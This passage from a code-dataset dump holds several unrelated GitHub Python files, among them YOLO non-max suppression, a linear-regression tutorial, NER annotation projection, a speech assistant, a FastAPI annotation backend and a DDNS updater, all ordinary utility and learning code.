# La fonction np.where permet d'appliquer un test booleen a chaque pixel et de specifier la reponse.\n\n# AFFICHAGE\nplt.figure()\nplt.clf()\nplt.imshow(Z) # Affichage de l'altitude\nplt.colorbar()\nplt.xlabel('$km$') # On specifie le label en x\nplt.ylabel('$km$') # On specifie le label en y\nplt.title('Zones marines') # On specifie le titre\nplt.show() # On affiche l'image\n\n","repo_name":"lcharleux/numerical_analysis","sub_path":"doc/Traitement_images/Example_code/europe_seuillage.py","file_name":"europe_seuillage.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74355146185","text":"\"\"\"\nThe output of YOLO contains probabilities but no discrete object detections.\nThis file helps to look for all detections above a certain threshold.\nIn a next step, non-max-suppression needs to be applied to these detections.\nThe nms algorithm is here, too.\n\"\"\"\nimport numpy as np\nimport tensorflow as tf\n\nfrom utils.prediction import extract_from_blob, get_probabilities\nfrom utils.activations import np_sigmoid, softmax\n\ndef get_detections(predictions, threshold, anchors, out_x, out_y, in_x, in_y, B, C):\n \n predictions = predictions.reshape((-1, out_x, out_y, B, C+5))\n assert predictions.shape[0] == 1, \"this doesn't work on batches\"\n \n predictions = predictions[0] # drop the batch dimension\n \n # get the data out of the predictions\n classes, objectness, probs = get_probabilities(predictions, out_x, out_y, B, C)\n \n # probs is along the B dimension\n # for every cell in the output activation map, get the best bounding box score\n max_probs = probs.max(axis=-1)\n \n thresholded = max_probs > threshold\n # which coordinates are bigger than the threshold ?\n xy = np.where(thresholded)\n \n detections=[]\n # look at all the coordinates found by the thresholding\n for row, col in zip(xy[0], xy[1]):\n\n # for this coordinate, find the box with the highest objectness\n current_probs = objectness[row, col]\n box_idx = np.argmax(current_probs)\n box = predictions[row, col, box_idx]\n\n # get the predicted coordinates, convert them to percent\n # this is the same code as in the generator and the loss function\n # the network learns to predict coordinates encoded in this way\n p_x = (row + np_sigmoid(box[0])) / out_x\n p_y = (col + np_sigmoid(box[1])) / out_y\n p_dx = (np.exp(box[2]) * anchors[box_idx, 0]) / out_x\n p_dy = (np.exp(box[3]) * anchors[box_idx, 1]) / out_y\n\n # resize the predicted coordinates to the input resolution\n min_x = int ((p_x - p_dx/2.) * in_x)\n max_x = int ((p_x + p_dx/2.) * in_x)\n min_y = int ((p_y - p_dy/2.) * in_y)\n max_y = int ((p_y + p_dy/2.) 
* in_y)\n\n # clip them to the image size\n min_x = max(min_x, 0)\n max_x = min(max_x, in_x)\n min_y = max(min_y, 0)\n max_y = min(max_y, in_y)\n\n # get the highest class prediction\n current_classes = classes[row, col, box_idx]\n label = np.argmax(current_classes)\n\n\n detections.append((label, min_x, max_x, min_y, max_y, current_probs.max()))\n \n return detections\n\ndef apply_nms(detections, session, iou_threshold=0.2):\n # sort the detections\n #create a dictionary that maps labels to detections and their confidence scores\n label_dict={}\n\n for detection in detections:\n\n label, min_x, max_x, min_y, max_y, score = detection\n\n if label in label_dict:\n label_dict[label].append(((min_x, min_y, max_x, max_y), score))\n else:\n label_dict[label] = [((min_x, min_y, max_x, max_y), score)]\n \n # create a new dictionary. Again, it maps labels to detections\n # but the detections are now filtered with non-max suppression\n nms = {}\n\n for label in label_dict:\n boxes = [box for (box, score) in label_dict[label]]\n scores = [score for (box, score) in label_dict[label]]\n\n # tensorflow has a built-in algorithm for non-max suppresion\n # the result is an array of indexes into the list of boxes\n # those indices are the chosen / retained boxes\n # unfortunately, the list is a tensor\n # we need a session to evaluate the tensor\n # at the very top of this notebook we have created this session\n idx = tf.image.non_max_suppression(boxes, scores, 5, iou_threshold=iou_threshold)\n idx = session.run(idx)\n\n # boxes we keep\n boxes = [boxes[i] for i in idx]\n\n nms[label] = boxes\n \n return nms\n \ndef idx_to_name(detections, names):\n # convert a mapping from idx -> value\n # to name -> value\n # by making a lookup in names list\n detections = {names[key]: value for key,value in detections.items()}\n \n return detections","repo_name":"lhk/object_detection","sub_path":"yolov2/nms.py","file_name":"nms.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"18466193125","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# # 2 单变量的线性回归\n# 整个2的部分需要根据城市人口数量,预测开小吃店的利润\n# 数据在ex1data1.txt里,第一列是城市人口数量,第二列是该城市小吃店利润。\n\n# ## 2.1 Plotting the Data\n# 读入数据,然后展示数据\npath = 'ex1data1.txt'\ndata = pd.read_csv(path, header=None, names=['Population', 'Profit'])\nprint(data.head())\ndata.plot(kind='scatter', x='Population', y='Profit', figsize=(12,8))\nplt.show()\n\n# ## 2.2 梯度下降\n# 这个部分你需要在现有数据集上,训练线性回归的参数θ\ndef computeCost(X, y, theta):\n inner = np.power(((X * theta.T) - y), 2)\n return np.sum(inner) / (2 * len(X))\n\n# ### 2.2.2实现\n# 数据前面已经读取完毕,我们要为加入一列x,用于更新θ(0),然后我们将θ初始化为0,学习率初始化为0.01,迭代次数为1500次\n\ndata.insert(0, 'Ones', 1) #在第0列插入1,列名为’Ones’\n# 现在我们来做一些变量初始化。\n# 初始化X和y\ncols = data.shape[1] #cols=3\nX = data.iloc[:,:-1]#X是data里的除最后列\ny = data.iloc[:,cols-1:cols]#y是data最后一列\n\n# 代价函数是应该是numpy矩阵,所以我们需要转换X和Y,然后才能使用它们。 我们还需要初始化theta。\nX = np.matrix(X.values)\ny = np.matrix(y.values)\ntheta = np.matrix(np.array([0,0]))\nprint(X.shape, theta.shape, y.shape)# 看下维度\n\n# ### 2.2.3计算J(θ) #这个部分计算J(Ѳ),X是矩阵\nprint(computeCost(X, y, theta)) # 计算代价函数 (theta初始值为0),答案应该是32.07\n# ### 2.2.4 梯度下降\n# 记住J(θ)的变量是θ,而不是X和y,意思是说,我们变化θ的值来使J(θ)变化,而不是变化X和y的值。\n# 一个检查梯度下降是不是在正常运作的方式,是打印出每一步J(θ)的值,看他是不是一直都在减小,并且最后收敛至一个稳定的值。\n# θ最后的结果会用来预测小吃店在35000及70000人城市规模的利润。\n\ndef gradientDescent(X, y, theta, alpha, iters):\n temp = np.matrix(np.zeros(theta.shape)) #[0. 
0.]\n parameters = int(theta.ravel().shape[1]) #需要更新的参数 2 .ravel()扁平化\n cost = np.zeros(iters)\n for i in range(iters):\n error = (X * theta.T) - y\n for j in range(parameters):\n term = np.multiply(error, X[:, j]) # np.multiply 数组对应元素位置相乘\n temp[0, j] = theta[0, j] - ((alpha / len(X)) * np.sum(term))\n theta = temp\n cost[i] = computeCost(X, y, theta)\n return theta, cost\n\n# 这个部分实现了Ѳ的更新\nalpha = 0.01 # 初始化一些附加变量 - 学习速率α和要执行的迭代次数,2.2.2中已经提到。\niters = 1500\n\n# 现在让我们运行梯度下降算法来将我们的参数θ适合于训练集。\ng, cost = gradientDescent(X, y, theta, alpha, iters) #g为训练得的模型参数\nprint(g,cost)\npredict1 = [1, 3.5] * g.T\nprint(\"predict1:\", predict1)\npredict2 = [1, 7] * g.T\nprint(\"predict2:\", predict2)\n# 预测35000和70000城市规模的小吃摊利润\nx = np.linspace(data.Population.min(), data.Population.max(), 100) #x轴指定区间取100个等间距点\nf = g[0, 0] + (g[0, 1] * x) #g=[[-3.63029144 1.16636235]] f为100个x的预测结果\nfig, ax = plt.subplots(figsize=(12, 8))\nax.plot(x, f, 'r', label='Prediction') #画线\nax.scatter(data.Population, data.Profit, label='Traning Data') #画点\nax.legend(loc=2)\nax.set_xlabel('Population')\nax.set_ylabel('Profit')\nax.set_title('Predicted Profit vs. Population Size')\nplt.show()\n# 显示原始数据以及拟合的直线\n\n\n\n\n# # 3 多变量线性回归\n# ex1data2.txt里的数据,第一列是房屋大小,第二列是卧室数量,第三列是房屋售价\n# 根据已有数据,建立模型,预测房屋的售价\npath = 'ex1data2.txt'\ndata2 = pd.read_csv(path, header=None, names=['Size', 'Bedrooms', 'Price'])\nprint(data2.head())\n\n# ## 3.1 特征归一化\n# 观察数据发现,size变量是bedrooms变量的1000倍大小,统一量级会让梯度下降收敛的更快。做法就是,将每类特征减去他的平均值后除以标准差\ndata2 = (data2 - data2.mean()) / data2.std()\nprint(data2.head())\n\n# ## 3.2 梯度下降\n# 加一列常数项\ndata2.insert(0, 'Ones', 1)\n\n# 初始化X和y\ncols = data2.shape[1]\nX2 = data2.iloc[:, 0:cols - 1]\ny2 = data2.iloc[:, cols - 1:cols]\n\n# 转换成matrix格式,初始化theta\nX2 = np.matrix(X2.values)\ny2 = np.matrix(y2.values)\ntheta2 = np.matrix(np.array([0, 0, 0]))\n\n# 运行梯度下降算法\ng2, cost2 = gradientDescent(X2, y2, theta2, alpha, iters)\nprint(g2)\n\n\n# ## 3.3 正规方程\n# 正规方程是通过求解下面的方程来找出使得代价函数最小的参数的:$\\frac{\\partial }{\\partial {{\\theta }_{j}}}J\\left( {{\\theta }_{j}} \\right)=0$ 。\n# 假设我们的训练集特征矩阵为 X(包含了${{x}_{0}}=1$)并且我们的训练集结果为向量 y,则利用正规方程解出向量 $\\theta ={{\\left( {{X}^{T}}X \\right)}^{-1}}{{X}^{T}}y$ 。\n# 上标T代表矩阵转置,上标-1 代表矩阵的逆。设矩阵$A={{X}^{T}}X$,则:${{\\left( {{X}^{T}}X \\right)}^{-1}}={{A}^{-1}}$\n#\n# 梯度下降与正规方程的比较:\n#\n# 梯度下降:需要选择学习率α,需要多次迭代,当特征数量n大时也能较好适用,适用于各种类型的模型\n# 正规方程:不需要选择学习率α,一次计算得出,需要计算${{\\left( {{X}^{T}}X \\right)}^{-1}}$,如果特征数量n较大则运算代价大,\n# 因为矩阵逆的计算时间复杂度为$O(n3)$,通常来说当$n$小于10000 时还是可以接��的,只适用于线性模型,不适合逻辑回归模型等其他模型\n\n# 正规方程\ndef normalEqn(X, y):\n theta = np.linalg.inv(X.T @ X) @ X.T @ y # X.T@X等价于X.T.dot(X)\n return theta\nfinal_theta2 = normalEqn(X, y) # 这里用的是data1的数据\nprint(final_theta2)\n# 梯度下降得到的结果是matrix([[-3.24140214, 1.1272942 ]])","repo_name":"chenmeilong/SRai","sub_path":"machine_learning/WuEnDa_class/1.线性回归/numpy裸写线性回归.py","file_name":"numpy裸写线性回归.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"38483231035","text":"import multiprocessing\nimport os\nfrom typing import List, Dict\nfrom projection.dataset import ProjectionDataloader\nimport math\nfrom tqdm.auto import tqdm\nimport string\nfrom functools import partial\n\npuncs = set(string.punctuation)\n\n\ndef batch(iterable, n=1) -> iter:\n\n l: int = len(iterable)\n p: int = math.ceil(l / n)\n for ndx in range(0, l, p):\n yield iterable[ndx : min(ndx + p, l)]\n\n\ndef sentence_projection(\n source_words: List[str],\n source_tags_type: List[str],\n source_tags_ids: 
List[List[int]],\n target_words: List[str],\n alignments: Dict,\n remove_puncs: bool = True, # If a source word is aligned to a punctuation mark, we remove the alignment.\n # Use True if you are projection named entities or labels with a small number of words.\n # Use false for argumentation datasets and datasets in which the labels are long sentences.\n fill_gap_size: int = 1, # If the projected label is split in two or more parts, we fill the gap if the gap size is\n # less or equal than fill_gap_size. Else we will choose the largest label and remove the other part.\n # Use True 1 if you are projection named entities or labels with a small number of words.\n # Use a larger value for argumentation datasets and datasets in which the labels are long sentences.\n) -> List[str]:\n\n assert len(source_tags_type) == len(source_tags_ids)\n\n if len(target_words) == 0 or len(source_words) == 0:\n print(\n f\"Warning, empty sentence found. source_words: {source_words}. target_words: {target_words}\"\n )\n return [\"O\"] * len(target_words)\n\n # GET TARGET TAGS IDS\n\n target_tags_ids: List[List[int]] = []\n target_tags_types: List[str] = []\n\n for source_tag_ids, source_tag_type in zip(source_tags_ids, source_tags_type):\n target_tag = []\n for tag_id in source_tag_ids:\n try:\n target_tag.extend(alignments[tag_id])\n except KeyError:\n continue\n\n target_tag = sorted(\n list(set(target_tag))\n ) # ENSURE NO DUPLICATED VALUES AND SORT\n\n if target_tag:\n target_tags_ids.append(target_tag)\n target_tags_types.append(source_tag_type)\n\n # REMOVE TAGS THAT ARE PUNCTUATION\n if remove_puncs:\n for target_tag_idx in range(len(target_tags_ids) - 1, -1, -1):\n target_tags_c = target_tags_ids[target_tag_idx].copy()\n for tag_idx in range(len(target_tags_ids[target_tag_idx]) - 1, -1, -1):\n try:\n tword = target_words[\n target_tags_ids[target_tag_idx][tag_idx]\n ].strip()\n except IndexError:\n raise IndexError(\n f\"\\ntarget_tags_ids: {target_tags_ids}\\n\"\n f\"target_tags_c: {target_tags_c}\\n\"\n f\"target_tags_ids[target_tag_idx]: {target_tags_ids[target_tag_idx]}\\n\"\n f\"tag_idx: {tag_idx}\\n\"\n f\"target_tag_idx:{target_tag_idx}\\n\"\n f\"source_words: {source_words}\\n\"\n f\"target_words: {target_words}\\n\"\n )\n if all([char in puncs for char in tword]):\n # print(f\"Warning: Removing word: {tword} from projected tag. 
\")\n del target_tags_ids[target_tag_idx][tag_idx]\n\n if len(target_tags_ids[target_tag_idx]) == 0:\n del target_tags_ids[target_tag_idx]\n del target_tags_types[target_tag_idx]\n # print(f\"Warning: Removing tag: {[target_words[i] for i in target_tags_c]}\")\n\n # FIX DISCONTINUOUS SPANS\n\n for target_tag_no, target_tag_ids in enumerate(target_tags_ids):\n\n # SPLIT IN GROUPS\n\n groups: List[List[int]] = [[target_tag_ids[0]]]\n for tag_id in target_tag_ids[1:]:\n if tag_id != groups[-1][-1] + 1:\n groups.append([tag_id])\n else:\n groups[-1].append(tag_id)\n\n # MERGE GROUPS WITH GAP = 1\n\n i = 0\n while i < len(groups) - 1:\n if groups[i + 1][-1] - groups[i][0] <= (fill_gap_size + 1):\n\n groups[i] = (\n groups[i]\n + list(range(groups[i][-1] + 1, groups[i + 1][0]))\n + groups[i + 1]\n )\n del groups[i + 1]\n else:\n i += 1\n\n # GET LARGEST GROUP\n\n target_tags_ids[target_tag_no] = max(groups, key=len)\n\n # FIX COLLISIONS\n # MERGE SAME TYPE TAGS\n\n i = 0\n while i < len(target_tags_ids) - 1:\n if target_tags_ids[i][-1] >= target_tags_ids[i + 1][0]:\n\n if target_tags_types[i] == target_tags_types[i + 1]:\n target_tags_ids[i] = sorted(\n list(set(target_tags_ids[i] + target_tags_ids[i + 1]))\n )\n\n del target_tags_ids[i + 1]\n del target_tags_types[i + 1]\n\n else:\n i += 1\n else:\n i += 1\n\n # GET LARGEST TAG IF COLLISION\n i = 0\n while i < len(target_tags_ids) - 1:\n if target_tags_ids[i][-1] >= target_tags_ids[i + 1][0]:\n if len(target_tags_ids[i]) > len(target_tags_ids[i + 1]):\n del target_tags_types[i + 1]\n del target_tags_ids[i + 1]\n else:\n del target_tags_types[i]\n del target_tags_ids[i]\n\n else:\n i += 1\n\n # WRITE TAGS\n\n target_tags: List[str] = [\"O\"] * len(target_words)\n\n for tag_ids, tag_type in zip(target_tags_ids, target_tags_types):\n try:\n if tag_ids:\n target_tags[tag_ids[0]] = f\"B-{tag_type}\"\n for tag_id in tag_ids[1:]:\n target_tags[tag_id] = f\"I-{tag_type}\"\n except IndexError:\n print(f\"target_tags: {target_tags}. tag_id:{tag_ids}\")\n print(f\"Source words: {source_words}\")\n print(f\"Source tags: {source_tags_ids}\")\n print(f\"target_words: {target_words}.\")\n print(f\"alignments: {alignments}\")\n print(\"=================================\")\n raise\n\n return target_tags\n\n\ndef sentences_projection(\n sources_words: List[List[str]],\n sources_tags_type: List[List[str]],\n sources_tags_ids: List[List[List[int]]],\n target_words: List[List[str]],\n alignments: List[Dict],\n remove_puncs: bool = True,\n fill_gap_size: int = 1,\n) -> str:\n\n assert (\n len(sources_words)\n == len(sources_tags_type)\n == len(sources_tags_ids)\n == len(target_words)\n == len(alignments)\n ), (\n f\"len(sources_words): {len(sources_words)}. \"\n f\"len(sources_tags_type): {len(sources_tags_type)}. \"\n f\"len(sources_tags_ids): {len(sources_tags_ids)}. \"\n f\"len(target_words): {len(target_words)}. \"\n f\"len(alignments): {len(alignments)}. \\n\"\n f\"sources_words: {sources_words}. \"\n f\"sources_tags_ids: {sources_tags_ids}. \"\n f\"target_words: {target_words}. 
\"\n f\"alignments: {alignments}.\"\n )\n\n output: List[str] = []\n\n for (\n source_words,\n source_tags_type,\n source_tags_ids,\n target_words,\n alignments,\n ) in zip(\n sources_words, sources_tags_type, sources_tags_ids, target_words, alignments\n ):\n if target_words and source_words:\n target_tags = sentence_projection(\n source_words=source_words,\n source_tags_type=source_tags_type,\n source_tags_ids=source_tags_ids,\n target_words=target_words,\n alignments=alignments,\n remove_puncs=remove_puncs,\n fill_gap_size=fill_gap_size,\n )\n\n assert len(target_words) == len(target_tags)\n\n output.append(\n \"\\n\".join([f\"{w} {t}\" for w, t in zip(target_words, target_tags)])\n )\n\n else:\n print(\n f\"Warning, empty sentence found. source_words: {source_words}. target_words: {target_words}\"\n )\n\n return \"\\n\\n\".join(output)\n\n\ndef dataset_projection(\n source_dataset: str,\n target_sentences: str,\n alignments_path: str,\n batch_size: int,\n output_path: str,\n remove_puncs: bool = True,\n fill_gap_size: int = 1,\n):\n print(\n f\"Datset projection:\\n\"\n f\"Source dataset: {source_dataset}.\\n\"\n f\"Target_sentences: {target_sentences}.\\n\"\n f\"alignments_path: {alignments_path}.\\n\"\n f\"batch_size: {batch_size}.\\n\"\n f\"output_path:{output_path}.\\n\"\n f\"remove_puncs: {remove_puncs}.\\n\"\n f\"fill_gap_size: {fill_gap_size}.\\n\"\n )\n\n os.makedirs(os.path.abspath(os.path.dirname(output_path)), exist_ok=True)\n\n data_loader = ProjectionDataloader(\n source_tsv=source_dataset,\n target_txt=target_sentences,\n alignments_talp=alignments_path,\n batch_size=batch_size,\n )\n data_loader_len = len(data_loader)\n\n data_loader = iter(data_loader)\n\n source_words, tags_type, tags_ids, target_words, alignment_dictionary = next(\n data_loader\n )\n\n projections = []\n\n projection_function = partial(\n sentences_projection, remove_puncs=remove_puncs, fill_gap_size=fill_gap_size\n )\n\n with open(output_path, \"w+\", encoding=\"utf8\") as output_file, tqdm(\n total=data_loader_len, desc=\"Annotation projection\"\n ) as pbar:\n while (\n source_words\n and tags_type\n and tags_ids\n and target_words\n and alignment_dictionary\n ):\n with multiprocessing.Pool(os.cpu_count()) as pool:\n\n async_job = pool.starmap_async(\n projection_function,\n zip(\n batch(source_words, n=os.cpu_count()),\n batch(tags_type, n=os.cpu_count()),\n batch(tags_ids, n=os.cpu_count()),\n batch(target_words, n=os.cpu_count()),\n batch(alignment_dictionary, n=os.cpu_count()),\n ),\n )\n\n if projections:\n print(\"\\n\\n\".join(projections), file=output_file)\n print(file=output_file)\n\n pbar.update(1)\n\n try:\n (\n source_words,\n tags_type,\n tags_ids,\n target_words,\n alignment_dictionary,\n ) = next(data_loader)\n except StopIteration:\n source_words = []\n tags_type = []\n tags_ids = []\n target_words = []\n alignment_dictionary = []\n\n projections = async_job.get()\n\n if projections:\n print(\"\\n\\n\".join(projections), file=output_file)\n print(file=output_file)\n","repo_name":"ikergarcia1996/Easy-Label-Projection","sub_path":"projection/annotation_proyection.py","file_name":"annotation_proyection.py","file_ext":"py","file_size_in_byte":11108,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"10928331536","text":"import speech_recognition as sr\nimport pyttsx3\n\ndef listen():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Dinliyorum...\")\n r.adjust_for_ambient_noise(source)\n audio = 
r.listen(source)\n\n try:\n text = r.recognize_google(audio, language=\"en-EN\") # Türkçe olarak tanıma yapmak için \"tr-TR\" kullanıyoruz\n print(\"Anlaşılan metin: \", text)\n return text\n except sr.UnknownValueError:\n print(\"Ses anlaşılamadı.\")\n except sr.RequestError as e:\n print(\"Ses tanıma hizmetine erişilemedi; {0}\".format(e))\n\ndef speak(text):\n engine = pyttsx3.init()\n engine.setProperty('rate', 150) # Konuşma hızı ayarlanabilir (isteğe bağlı)\n engine.setProperty('volume', 0.8) # Ses düzeyi ayarlanabilir (isteğe bağlı)\n engine.say(text)\n engine.runAndWait()\n\ndef assistant():\n while True:\n command = listen()\n if command == \"stop\":\n break\n \n if \"hello\" in command:\n response = \"hi\"\n speak(response)\n elif \"what's up\" in command:\n response = \"I'm fine thanks how about you\"\n speak(response)\n\n else:\n response = \"Anladım. Komutunuz: \" + command\n speak(response)\n\nassistant()\n","repo_name":"osmn-byhn/JARVIS","sub_path":"jarvis.py","file_name":"jarvis.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"10788871347","text":"from bs4 import BeautifulSoup\n\nwith open(\"web_crawler/bs4_test/test.html\") as fin:\n html_doc = fin.read()\n\nsoup = BeautifulSoup(html_doc, \"html.parser\")\n\n# find a div node with id equal to content\ndiv_node = soup.find(\"div\", id = \"content\")\n\ntry:\n # find all html content with a tag\n inks = div_node.find_all(\"a\")\nexcept:\n print(\"html not found\")\nfinally:\n print(\"finally\")\n\n# find all content with img tag\nimg = soup.find(\"img\")\nprint(img[\"src\"])\n\n\n# for link in links:\n# print(link.name, link[\"href\"], link.get_text())\n\n","repo_name":"qyy752457002/Requests_Urllib_Projects","sub_path":"bs4_test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14027101327","text":"#https://atcoder.jp/contests/abc202/tasks/abc202_b\n\ns = input()\n\n#反転する\n#6=>7=>9\n#9=>5=>6\ns = s[::-1].replace(\"6\", \"7\").replace(\"9\", \"5\").replace(\"7\", \"9\").replace(\"5\", \"6\")\n#5,7は含まれないため\nprint(s)\n\n\n\"\"\"\n提出情報\n提��日時\t2021-05-28 10:12:29\n問題\tB - 180°\nユーザ\tOrcaDive_U \n言語\tPython (3.8.2)\n得点\t200\nコード長\t145 Byte\n結果\t\n実行時間\t29 ms\nメモリ\t9004 KB\n\n\"\"\"","repo_name":"Runacy/ProblemsSolution_myself","sub_path":"B180.py","file_name":"B180.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72118188424","text":"import csv\n\n# with open(\"sample.csv\", \"r\", newline=\"\") as csv_file:\n# data = csv.reader(csv_file, delimiter=\"!\", skipinitialspace=True, quotechar=\",\")\n#\n# for item in data:\n# # print(item)\n# # print(item[0], item[1], item[2], item[3], item[4])\n# print(item[1])\n\n\ndata_header = [\"sl\", \"Name\", \"Age\"]\nscholar_data = [\n [\"1\", \"Jb\", \"29\"],\n [\"2\", \"jbg\", \"28\"],\n [\"3\", \"bala\", \"25\"]\n ]\n\nwith open (\"scholars.csv\", \"w\") as csv_file:\n data = csv.writer(csv_file)\n data.writerow(data_header)\n data.writerows(scholar_data)\n","repo_name":"Jeyabalaganesh/New_Project_23052021","sub_path":"Day25_CSV files.py","file_name":"Day25_CSV files.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6439009536","text":"import 
os\nfrom difflib import SequenceMatcher\nfrom pprint import pprint\n\n\ndef get_files(subdir):\n contents = os.listdir(subdir)\n dirs = [os.path.join(subdir, i) for i in contents if os.path.isdir(os.path.join(subdir, i))]\n files = [os.path.join(subdir, i) for i in contents if os.path.isfile(os.path.join(subdir, i))]\n files = [i for i in files if i[-3:] in ['avi', 'mkv', 'mp4']]\n for my_dir in dirs:\n files = get_files(my_dir) + files\n return files\n\n\ndef similar(a, b):\n p = round(SequenceMatcher(None, a, b).ratio(), 2)\n return p\n\n\nclass Collection:\n def __init__(self, path):\n self.path = path\n self.files = []\n self.collection = {}\n self.scan()\n\n def validate(self):\n if self.path == '':\n return False\n return True\n\n def scan(self):\n if self.validate():\n struct = []\n struct += get_files(self.path)\n self.files = sorted(struct)\n\n def discover_show(self, show_name, episode_key):\n mem = ['', -999.00]\n for file in self.files:\n new_file = self.shorten_path_to_file(file)\n clean_file = file.lower().replace('.', ' ')\n clean_show_name = self.clean_show_name(show_name)\n parts = clean_file.split(os.path.sep)\n if len(parts) > 1:\n if clean_show_name == parts[0] and episode_key.lower() in clean_file:\n mem = [new_file, 1.00]\n break\n\n if clean_show_name in clean_file and episode_key.lower() in clean_file:\n mem = [new_file, 0.99]\n # break\n\n prob = similar(f\"{show_name}.{episode_key}\", new_file)\n if mem[1] < prob:\n mem = [new_file, prob]\n\n return mem\n\n def shorten_path_to_file(self, file):\n return file.replace(self.path + os.path.sep, '')\n\n def clean_show_name(self, show_name):\n if show_name == 'Stargate SG-1':\n return 'gwiezdne wrota'\n return show_name.lower().replace('\\'', '').replace('...', '')\n\n def is_deleted(self, file):\n file_path = os.path.join(self.path, file)\n if os.path.isfile(file_path):\n return False\n return True\n\n def delete(self, file):\n file_path = os.path.join(self.path, file)\n print(f'Removing {file_path}')\n os.unlink(file_path)\n","repo_name":"Czupak/SeriesWatcher","sub_path":"serieswatcher/collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70082363785","text":"from typing import List\n\n\nclass Solution:\n def maxChunksToSorted(self, arr: List[int]) -> int:\n n = len(arr)\n ans = 0\n\n curMax = -1\n for i in range(n):\n if arr[i] > curMax:\n curMax = arr[i]\n\n if curMax == i:\n ans += 1\n curMax = -1\n\n return ans\n","repo_name":"tiandiyijian/myLeetcode","sub_path":"769.py","file_name":"769.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70475863624","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Irving\n\nclass Weapon:\n def prick(self, obj): # 这是该装备的主动技能, 扎死对方\n obj.life -= 500 # 假设攻击力为500\n\nclass Person: # 定义一个人类\n role = 'person' # 人的角色属性都是人\n\n def __init__(self, name, life):\n self.name = name # 每一个角色都有自己的昵称;\n self.weapon = Weapon() # 给角色绑定一个武器;\n self.life = life\n\negg = Person('egon', 600)\np1 = Person('bb', 600)\negg.weapon.prick(p1)\nprint(p1.life)","repo_name":"Xuchaoqiang/Luffycity","sub_path":"第三模块(面向对象、网络编程)/面向对象编程/组合.py","file_name":"组合.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15392305920","text":"# -*- coding: utf-8 -*-\nfrom 
__future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.datetime_safe\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blogs', '0002_auto_20140926_2033'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='edition',\n options={'ordering': ['modified_at']},\n ),\n migrations.AlterModelOptions(\n name='post',\n options={'ordering': ['modified_at']},\n ),\n migrations.AddField(\n model_name='edition',\n name='created_at',\n field=models.DateTimeField(default=datetime.date(2014, 9, 26), auto_now_add=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='edition',\n name='modified_at',\n field=models.DateTimeField(default=datetime.date(2014, 9, 26), auto_now=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='post',\n name='created_at',\n field=models.DateTimeField(default=django.utils.datetime_safe.date.today, auto_now_add=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='post',\n name='modified_at',\n field=models.DateTimeField(default=datetime.datetime(2014, 9, 26, 21, 6, 46, 197275), auto_now=True),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='edition',\n name='post',\n field=models.ForeignKey(to='blogs.Post', related_name='editions'),\n ),\n ]\n","repo_name":"ericmok/djangosimpleblog","sub_path":"blogs/migrations/0003_auto_20140926_2106.py","file_name":"0003_auto_20140926_2106.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39444478150","text":"# Example code for a Python backend to handle `submitURL` posts. See tools/backend\n# for a more extensive example using nodejs to write the backend server.\n\nimport json\nimport uvicorn\nfrom fastapi import FastAPI, Body\nfrom fastapi.middleware.cors import CORSMiddleware\n\n\napp = FastAPI()\n# Add cors configuration to allow requests from any origin\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# Set submitToken to bind this submission to its corresponding task\n@app.post(\"/\")\ndef demo(submitToken: str, annotation: dict = Body(...)):\n print(\"annotation:\", json.dumps(annotation, sort_keys=True, indent=4, separators=(\",\", \":\")))\n print(\"submitToken:\", submitToken)\n return \"OK\"\n\n\nif __name__ == \"__main__\":\n # 'backend' is the name of this file\n uvicorn.run(app=\"backend:app\", host=\"localhost\", port=8000, reload=True, debug=True)\n","repo_name":"anucvml/vidat","sub_path":"tools/python/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"81"} +{"seq_id":"45460752006","text":"from DomainRecordChanger import DomainRecordChanger\nfrom SettingsManager import SettingsManager\nfrom urllib.request import urlopen\nimport logging\nimport sys\n\n\nclass DDNS:\n settings_manager = None\n ip_url = None\n domain_settings = None\n ip_addrs = dict()\n\n @staticmethod\n def init_logging():\n log_settings = DDNS.settings_manager.get_log_settings()\n log_level = log_settings[\"logLevel\"]\n if log_level.lower() == \"debug\":\n log_level = logging.DEBUG\n elif 